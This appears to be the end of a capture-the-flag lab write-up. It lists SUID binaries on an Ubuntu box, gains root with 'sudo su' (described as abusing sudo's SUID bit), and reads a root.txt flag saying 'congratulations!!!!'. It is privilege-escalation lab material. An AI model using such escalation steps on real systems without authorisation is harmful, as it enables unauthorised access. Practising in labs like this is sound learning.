/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/vmware-user-suid-wrapper

Abusing the SUID bit of sudo to get root access.

nyan@ubuntu:~$ sudo su

root@ubuntu:/home/nyan# id
uid=0(root) gid=0(root) groups=0(root)

root.txt

Answer: congratulations!!!!
Steps to Reproduce:

root@ubuntu:/home/nyan# cd 

root@ubuntu:~# ls
root.txt

root@ubuntu:~# cat root.txt
congratulations!!!!

References

PreviousEncryption - Crypto 101 NextKenobi

Last updated 3 months ago